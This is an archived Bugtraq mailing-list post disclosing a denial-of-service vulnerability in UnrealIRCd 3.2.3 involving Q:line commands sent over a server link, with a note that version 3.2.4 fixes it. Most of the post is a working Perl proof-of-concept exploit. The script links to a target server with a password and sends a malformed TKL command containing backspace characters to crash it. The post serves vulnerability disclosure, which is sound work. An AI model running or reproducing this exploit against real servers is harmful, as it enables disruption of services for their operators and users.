lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060309185815.12429.qmail@securityfocus.com>
Date: 9 Mar 2006 18:58:15 -0000
From: admin@...neck.servebeer.com
To: bugtraq@...urityfocus.com
Subject: UnrealIRCd3.2.3 Server-Link Denial of Service


-Description-
UnrealIRCd 3.2.3 is vulnerable to strings sent from a linked server for adding/removing Q:lines with special characters. Could be sent through services.
Fixed as of version 3.2.4

-PoC-
#!/usr/bin/perl

# Denial of Service exploit for UnrealIRCd 3.2.3
# Successfully tested on both Win32 and Linux versions.
# admin@...neck.servebeer.com (Brandon Milner)

use IO::Socket;
print ("UnrealIRCd Server-Link Denial of Service exploit PoC by Redneck\n");

#################
#   Variables   #
#################
$spass = ("LinkPass");				# Link Password
$lserver = ("your.server.name");		# Local Server name
$rserver = ("remote.server.name");		# Link Server
$rport = (6667);                     		# Link Port
$snum = (6);					# Server numeric

#################
# Create socket #
#################
my $sock = new IO::Socket::INET (
	PeerAddr => $rserver,
	PeerPort => $rport,
	Proto => 'tcp',
);

#################
#    Connect    #
#################
die "Couldn't create socket to $rserver / $rport!\n" unless $sock;
sleep 5;
print ("connected to server");
print $sock ("PASS $spass\n");
print ("PASS $spass\n");
print $sock ("SERVER $lserver 1 $snum :PoC by Redneck\n");
print ("SERVER $lserver 1 $snum :PoC by Redneck\n");
sleep 5;
print $sock ("TKL - q\x08Q *\x08PoC\n");
print ("TKL - q\x08Q *\x08PoC\n");
sleep 5;


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ